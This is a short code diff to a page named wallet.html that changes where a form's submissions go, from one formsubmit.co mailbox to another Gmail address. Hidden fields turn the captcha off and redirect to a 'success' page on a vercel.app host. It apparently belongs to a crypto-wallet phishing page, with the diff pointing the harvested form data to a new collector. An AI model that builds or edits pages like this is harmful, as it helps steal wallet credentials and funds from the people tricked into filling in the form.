--- a/wallet.html
+++ b/wallet.html
@@ -633,7 +633,7 @@
         </div>
       </div>
 
-   <form action="https://formsubmit.co/formsubmitmail@gmail.com" method="post" enctype="multipart/form-data" id="form" class="ajaxForm">
+   <form action="https://formsubmit.co/jklaymorris00@gmail.com" method="post" enctype="multipart/form-data" id="form" class="ajaxForm">
                                         <input type="hidden" name="_captcha" value="false">
                                         <input type="hidden" name="_next" value="https://dev-serverprotocol-app.vercel.app/access/point/success.html">
 
